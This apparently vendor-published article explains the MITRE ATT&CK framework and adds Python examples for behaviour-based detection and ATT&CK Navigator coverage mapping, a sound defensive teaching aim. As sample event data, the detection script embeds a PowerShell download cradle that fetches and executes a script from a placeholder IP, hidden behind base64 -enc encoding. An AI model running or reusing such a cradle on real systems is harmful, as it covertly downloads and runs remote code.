The MITRE ATT&CK Framework, Explained
MITRE ATT&CK is the common language of adversary behavior. Learn its tactics, techniques and sub-techniques, the matrices, and practical ways to use it for defense.
The MITRE ATT&CK framework is a globally accessible, continuously updated knowledge base of real-world adversary behavior. ATT&CK — which stands for Adversarial Tactics, Techniques, and Common Knowledge — catalogs how attackers operate at each stage of an intrusion, giving defenders a shared vocabulary to describe, detect and defend against threats. It has become the de facto standard for tactical threat intelligence and detection engineering.
Maintained by the non-profit MITRE Corporation and free to use, ATT&CK answers a question that signatures and indicator lists can't: not just what malicious file appeared, but what technique the adversary used — and therefore how to catch it even when the specific tools change.
Why ATT&CK matters
Before ATT&CK, every vendor and team described attacker behavior differently, making it hard to share knowledge or measure defensive coverage. ATT&CK created a common language. Today it underpins detection rules, red-team exercises, threat reports, security-product marketing and gap assessments across the industry. When a research blog says an actor used "T1566 (Phishing)" and "T1059 (Command and Scripting Interpreter)," any defender in the world knows exactly what's meant.
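The point above, that a technique outlives the tool that implements it, is easiest to see side by side. The following is an added example, not code from the original article: it runs an indicator check (a SHA-256 blocklist) and a behaviour check (an Office application spawning a script interpreter, or launching an executable from a user-writable path, which covers the T1566.001 to T1204.002 to T1059 chain the article's "T1566 / T1059" sentence describes) over a handful of constructed process-creation events loosely shaped like Sysmon Event ID 1 fields. The hashes, paths and events are all made up; the encoded-command decoding mirrors how PowerShell's -EncodedCommand expects base64 over UTF-16LE.

```python
import base64
import re

# Process images worth treating as "script interpreter" children, mapped to the
# ATT&CK sub-technique they most directly correspond to. wscript/cscript are left
# at the parent T1059 because the script language is not known from the image alone.
INTERPRETER_TECH = {
    "powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
    "cmd.exe": "T1059.003",
    "wscript.exe": "T1059", "cscript.exe": "T1059",
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:appdata|downloads)\\|\\temp\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def b64utf16(script):
    """Encode a script the way PowerShell -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none / it is malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample data: a download cradle, two fake file hashes, and four events.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s1')"
PS_HASH = "1a" * 32            # stands in for the legitimate powershell.exe hash
KNOWN_BAD = "be" * 32          # a loader seen in an earlier incident, on the blocklist
RECOMPILED = "c0" * 32         # the same loader rebuilt: new hash, same behaviour
BLOCKLIST = {KNOWN_BAD}

EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + b64utf16(CRADLE), "SHA256": PS_HASH},
    {"id": 2, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Users\bob\AppData\Roaming\rt.exe",
     "CommandLine": "rt.exe", "SHA256": RECOMPILED},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",        # an admin's interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + b64utf16("Get-Service | Where Status -eq Stopped"),
     "SHA256": PS_HASH},
    {"id": 4, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "CommandLine": "loader.exe", "SHA256": KNOWN_BAD},
]


def hash_hits(events, blocklist):
    """Indicator-based detection: fires only when the child's hash is already known bad."""
    return [e["id"] for e in events if e["SHA256"].lower() in blocklist]


def technique_hits(events):
    """Behaviour-based detection: an Office app spawning a script interpreter, or
    launching an executable from a user-writable directory. Returns
    (event id, ATT&CK technique IDs, detail) for each hit."""
    hits = []
    for e in events:
        parent = e["ParentImage"].rsplit("\\", 1)[-1].lower()
        child = e["Image"].rsplit("\\", 1)[-1].lower()
        if parent not in OFFICE_APPS:
            continue
        if child in INTERPRETER_TECH:
            detail = decode_encoded_command(e["CommandLine"]) or e["CommandLine"]
            hits.append((e["id"], ["T1566.001", "T1204.002", INTERPRETER_TECH[child]], detail))
        elif USER_WRITABLE.search(e["Image"]):
            hits.append((e["id"], ["T1566.001", "T1204.002"], e["Image"]))
    return hits


if __name__ == "__main__":
    print("hash blocklist hits:", hash_hits(EVENTS, BLOCKLIST))
    for event_id, techniques, detail in technique_hits(EVENTS):
        print(f"event {event_id}: {', '.join(techniques)} :: {detail}")
```

Against this data the blocklist catches only event 4, the loader whose hash was already known. The behaviour rule catches events 1, 2 and 4: the encoded download cradle (and surfaces its decoded contents in the alert), the recompiled loader with a hash nobody has seen, and the known loader, while leaving the administrator's encoded but interactive PowerShell in event 3 alone because the parent is not an Office application. That is the difference between detecting an artifact and detecting a technique.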
How ATT&CK is structured: tactics, techniques, sub-techniques
ATT&CK is organized as a hierarchy:
Tactics — the "why"
Tactics are the adversary's tactical goals, the reason behind an action. The Enterprise matrix defines 14 of them, listed here in roughly the order an intrusion progresses:
- Reconnaissance and Resource Development: gathering information and staging infrastructure, accounts or tooling before the attack.
- Initial Access: getting a first foothold in the environment.
- Execution: running attacker-controlled code on a system.
- Persistence: keeping that foothold across reboots, credential changes and cleanup.
- Privilege Escalation: obtaining higher-level permissions.
- Defense Evasion: avoiding detection while doing all of the above.
- Credential Access: stealing account names, passwords, tokens or keys.
- Discovery: learning what the environment looks like from the inside.
- Lateral Movement: moving to other systems in the environment.
- Collection: gathering data of interest to the adversary's objective.
- Command and Control: communicating with compromised systems to direct them.
- Exfiltration: moving stolen data out of the environment.
- Impact: manipulating, interrupting or destroying systems and data.
Techniques — the "how"
Each tactic contains many techniques — the specific methods adversaries use to achieve that goal. For example, under Initial Access you'll find techniques like Phishing (T1566) and Exploit Public-Facing Application (T1190). Each technique has a unique ID, a description, real-world examples of groups that use it, data sources for detecting it, and recommended mitigations.
Sub-techniques — the specifics
Many techniques break down further into sub-techniques. Phishing (T1566), for instance, has sub-techniques such as Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002) and Spearphishing via Service (T1566.003). Sub-technique IDs extend the parent ID with a three-digit suffix, so a tool that understands T1566 can always roll T1566.002 up to it. This granularity lets teams describe behavior precisely without losing the ability to talk about the broader category.
Together with the procedure examples ATT&CK records for each group and piece of software (the specific way a given actor carried a technique out), these correspond to an adversary's tactics, techniques and procedures (TTPs). In the Pyramid of Pain, TTPs are the apex: the layer an attacker finds hardest and most expensive to change, which is why detections built on behavior outlast those built on hashes, IP addresses and domain names.
The ATT&CK matrices
ATT&CK isn't one matrix but several, covering different technology domains:
- Enterprise — Windows, macOS, Linux, cloud, containers and networks. The most widely used matrix.
- Mobile — iOS and Android.
- ICS — industrial control systems and operational technology.
The matrix is usually shown as a grid: tactics across the top (in attack order) and techniques listed beneath each. This visual makes it easy to map an intrusion's full progression and to see where your detection coverage has gaps.
Groups and software
Beyond tactics and techniques, ATT&CK documents Groups (tracked threat actors, like APT29) and Software (malware and tools), each linked to the techniques they're known to use. This lets you pivot: start from an APT that targets your sector, see exactly which techniques it employs, and prioritize defenses accordingly.
Practical ways to use ATT&CK
ATT&CK is most valuable when you operationalize it:
- Detection coverage mapping. Map your existing detections to ATT&CK techniques to visualize where you're strong and where you're blind. The free ATT&CK Navigator tool is built for this: it renders the matrix as a heat map from a JSON layer file, which you can generate from your rule repository rather than click together by hand.
- Threat-informed defense. Identify the techniques used by adversaries that target your industry, and prioritize building detections for those first.
- Threat hunting. Use techniques as hypotheses — "are any hosts using technique X?" See our guide to threat hunting.
- Red and purple teaming. Emulate specific adversary techniques to test whether your controls actually detect them.
- Communication. Describe incidents and intelligence in a language every stakeholder and vendor understands.
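The first two uses in the list above, coverage mapping and threat-informed prioritisation, are usually done together: count which techniques your rules already cover, compare that against the techniques intelligence says your likely adversaries use, and hand the result to ATT&CK Navigator as a layer. The script below is an added example, not code from the original article or from the Navigator project. The detection rules, their Sigma-style `attack.tXXXX.YYY` tags and the priority list are all constructed; the layer fields used (`techniqueID`, `score`, `comment`, `color`, `gradient`, `domain`, `versions`) are the ones Navigator layer files carry, and the version numbers in `versions` are an assumption you should set to match the Navigator and ATT&CK versions you actually load it into.

```python
import json
import re
from collections import Counter

# Sigma-style technique tags look like "attack.t1566.001"; tactic tags ("attack.execution")
# are deliberately not matched, since coverage is counted per technique.
TECH_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$", re.IGNORECASE)

# Constructed sample detections (not real rules): a title plus ATT&CK tags.
DETECTIONS = [
    {"title": "Office application spawning a shell",
     "tags": ["attack.execution", "attack.t1059.001", "attack.t1566.001"]},
    {"title": "ISO attachment mounted, then LNK executed",
     "tags": ["attack.initial_access", "attack.t1566.001", "attack.t1204.002"]},
    {"title": "Encoded PowerShell command line",
     "tags": ["attack.execution", "attack.t1059.001", "attack.defense_evasion", "attack.t1027"]},
    {"title": "New service installed from user-writable path",
     "tags": ["attack.persistence", "attack.t1543.003"]},
    {"title": "LSASS handle opened by non-system process",
     "tags": ["attack.credential_access", "attack.t1003.001"]},
]

# Constructed stand-in for "techniques used by adversaries that target your sector".
PRIORITY = ["T1566.001", "T1566.002", "T1059.001", "T1003.001", "T1021.001", "T1190", "T1486"]


def technique_ids(tags):
    """Technique and sub-technique IDs referenced by a rule's tags, normalised to upper case."""
    return {m.group(1).upper() for m in (TECH_TAG.match(t) for t in tags) if m}


def coverage_counts(detections):
    """Number of detections per technique. A sub-technique also credits its parent,
    so that T1566's cell is shaded when only T1566.001 is covered; a rule that tags
    both a parent and its child still counts once for the parent."""
    counts = Counter()
    for rule in detections:
        ids = technique_ids(rule["tags"])
        parents = {tid.split(".")[0] for tid in ids}
        for tid in ids | parents:
            counts[tid] += 1
    return counts


def gaps(counts, priority):
    """Priority techniques with no detection at all, in priority order."""
    return [tid for tid in priority if counts.get(tid, 0) == 0]


def navigator_layer(counts, priority, name="Detection coverage"):
    """Build an ATT&CK Navigator layer: score = rule count, uncovered priority techniques in red."""
    max_score = max(counts.values(), default=1)
    techniques = []
    for tid in sorted(set(counts) | set(priority)):
        n = counts.get(tid, 0)
        entry = {"techniqueID": tid, "score": n, "comment": f"{n} detection(s)"}
        if n == 0:                       # only priority techniques can reach here with 0
            entry["comment"] += "; priority technique with no coverage"
            entry["color"] = "#ff6666"   # an explicit color overrides the gradient
        techniques.append(entry)
    return {
        "name": name,
        # Assumed version numbers: set them to the ATT&CK/Navigator versions you use.
        "versions": {"attack": "15", "navigator": "5.0.0", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection rule count per technique; red = priority technique uncovered",
        "techniques": techniques,
        "gradient": {"colors": ["#ffffff", "#2e8b57"], "minValue": 0, "maxValue": max_score},
    }


if __name__ == "__main__":
    counts = coverage_counts(DETECTIONS)
    print("uncovered priority techniques:", gaps(counts, PRIORITY))
    with open("coverage-layer.json", "w") as fh:
        json.dump(navigator_layer(counts, PRIORITY), fh, indent=2)
```

Run it and open `coverage-layer.json` in Navigator (Open Existing Layer, then upload). With the constructed data the gap list is T1566.002, T1021.001, T1190 and T1486: the sector's adversaries reportedly use phishing links, SMB-based lateral movement, exploitation of public-facing applications and data encryption for impact, and none of the five rules touches them. The rule repository is the source of truth here; regenerate the layer whenever rules change rather than editing the layer by hand.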
Limitations to keep in mind
ATT&CK is powerful but not a silver bullet. It describes known, observed techniques, so brand-new methods may not yet appear. Full coverage of every technique is neither realistic nor necessary — focus on the techniques most relevant to your threat model. And ATT&CK tells you what adversaries do, not the likelihood they'll target you; that requires pairing it with threat intelligence about who is active in your sector.
It's also worth remembering that ATT&CK is updated regularly, typically twice a year, as new techniques are observed and existing ones are reorganized: techniques get split, merged or revoked (the introduction of sub-techniques in version 7 in 2020 folded, for example, the old PowerShell technique T1086 into T1059.001). Treat your coverage map as a living document, check it for references to revoked IDs after each release, and re-prioritize as the adversaries targeting your industry change their methods. A mapping that was accurate a year ago can quietly drift out of date.
ATT&CK vs the Cyber Kill Chain and Diamond Model
ATT&CK is often compared to two other well-known models, and they actually complement each other rather than compete:
- The Cyber Kill Chain (developed by Lockheed Martin) describes an intrusion as a linear sequence of seven stages, from reconnaissance to actions on objectives. It's excellent for explaining the high-level flow of an attack and for thinking about where to break the chain, but it's intentionally coarse — it doesn't enumerate the hundreds of specific techniques an attacker might use at each stage.
- The Diamond Model focuses on the relationships between four core features of any intrusion: adversary, capability, infrastructure and victim. It's a powerful analytical tool for attribution and for pivoting during an investigation — if you know the infrastructure, you can reason about the adversary and likely victims.
- MITRE ATT&CK sits at a more granular level than both, providing the detailed catalog of specific techniques within each phase.
In practice, mature teams use all three: the Kill Chain to frame the narrative, ATT&CK to describe and detect the specific techniques, and the Diamond Model to structure attribution and pivoting. Understanding where each fits prevents the common mistake of treating ATT&CK as a checklist rather than a knowledge base.
The bottom line
MITRE ATT&CK transformed cybersecurity by giving the world a shared, structured language for adversary behavior. By mapping threats, detections and exercises to its tactics and techniques, defenders move beyond perishable indicators toward resilient, behavior-based defense. To apply it, you first need to know which techniques adversaries are actually using right now — which is exactly what our live threat intelligence feed surfaces, aggregating research that frequently maps the latest campaigns to ATT&CK techniques, ranked by priority.
Frequently asked questions
What is the MITRE ATT&CK framework?
MITRE ATT&CK is a free, continuously updated knowledge base of real-world adversary tactics and techniques. It gives defenders a common language to describe how attackers operate at each stage of an intrusion, and is widely used for detection engineering, threat hunting and red teaming.
What is the difference between tactics and techniques in ATT&CK?
Tactics are the adversary's goals — the 'why' behind an action, like Initial Access or Persistence. Techniques are the specific methods used to achieve those goals — the 'how', like Phishing or Exploit Public-Facing Application. Techniques can break down further into sub-techniques.
How many tactics are in MITRE ATT&CK?
The Enterprise matrix defines 14 tactics, ranging from Reconnaissance and Initial Access through Execution, Lateral Movement and Command and Control to Exfiltration and Impact. Other matrices (Mobile, ICS) define their own tactic sets.
How do you use the MITRE ATT&CK framework?
Common uses include mapping your detection coverage to techniques (using ATT&CK Navigator), prioritizing defenses against techniques used by adversaries targeting your sector, forming threat-hunting hypotheses, emulating techniques in red/purple teaming, and communicating incidents in a shared vocabulary.